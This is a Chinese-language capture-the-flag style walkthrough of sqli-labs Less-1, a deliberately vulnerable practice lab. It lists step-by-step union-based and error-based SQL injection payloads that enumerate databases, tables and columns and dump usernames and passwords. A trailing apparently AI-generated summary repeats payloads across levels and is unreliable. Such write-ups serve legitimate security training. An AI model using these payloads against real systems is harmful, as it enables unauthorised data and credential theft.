在线sqli-labs 通关大全 Less-1

5 篇文章 0 订阅
4 篇文章 0 订阅

sqli-labs (1)

sqli-labs实验前:

本人因在sqli-labs搭建过程中遇到大量问题,百度后依旧无果,所以现决定在在线sqli-labs平台进行试验。
sqli-labs在线平台: http://43.247.91.228:84/

在这里插入图片描述
在线平台sqli-labs Page-1 点击Less-1可直接进行试验
在这里插入图片描述

一.知识点

1.FireFox插件HackBar使用
2.字符型注入:注意单引号闭合
3.sqlmap这里暂时不使用,想了解的可以自己尝试,刚开始手工注入扎扎实实打基础较好。
4.字符型注入判断

(1)判断注入

?id=1' and 1=1 --+ 返回正确
?id=1' and 1=2 --+ 返回错误 

(2)猜字段

?id=1' order by 2 --+ 返回正确
?id=1' order by 3 --+ 返回错误 

得出字段数为 2

下面为测试空格字符代替情况 (可跳过)

?id=1' order by 2 -- - 返回正确
?id=1' order by 2 -- / 返回正确 

(3)爆数据库名

?id=1' and 1=2 union select 1,database()--+ 

得到数据库sqli

(4)爆表名

?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'--+ 

(5)爆列名

?id=1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+ 

(6)爆字段内容(flag)

?id=1' and 1=2 union select 1,group_concat(flag) from sqli.flag--+

二.题解

注:以下解题步骤大多以图片显示不再做过多解释

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
字段为3的时候显示正常,字段为4时显示错误,所以最终字段为3
在这里插入图片描述
数据库名为security
在这里插入图片描述
因为第二步爆出有3个字段,所以select后面要跟3个字段,下面这张图片为跟了两个字段时的情形会显示错误
在这里插入图片描述
爆出的表名有四个:emails,referers,uagents,users
在这里插入图片描述
上面四个表名中uagents,users两个表名最可疑,经过尝试在users表中得到了payload如下图
在这里插入图片描述
总结:字符型注入可以按照以上六步进行手工尝试最后得到payload

推荐:最后给大家推荐几个sql或者其他漏洞学习方面不错的网站
sql整数型/字符型注入: https://www.cnblogs.com/threesoil/p/12431496.html

ctf wiki: https://ctf-wiki.github.io/ctf-wiki/web/sqli-zh/

狼组知识库web方面: https://wiki.wgpsec.org/knowledge/web/

ctfhub sql注入wp: https://www.cnblogs.com/0yst3r-2046/p/12469632.html(最后这个是来自ctfhub学习中偶然看到的一位不认识的大佬,ta的ctf wp都挺详细的大家也可以多做学习)

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs是一个SQL注入学习平台,通过完成一系列的关卡来学习和实践SQL注入漏洞的利用方法。根据引用的描述,首先需要在浏览器中打开"http://127.0.0.1/sqli-labs/",访问平台的首页。然后点击"Setup/reset Database"按钮以创建数据库,创建表并填充数据。 完成了上述设置后,可以开始挑战关卡。 sqli-labs通关1关:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关2关:根据引用提供的内容,可以在账户密码后面加入"1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))#"来进行注入。这样就能够获取到users表中的用户名和密码的组合。 sqli-labs通关3关:通关3关的方法没有在提供的引用中找到相关信息。 sqli-labs通关4关:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关5关:通关5关的方法没有在提供的引用中找到相关信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [详细sqli-labs(1-65)通关讲解](https://blog.csdn.net/dreamthe/article/details/123795302)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Sqli-labs通关全解---关于Sqli-lab--1](https://blog.csdn.net/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值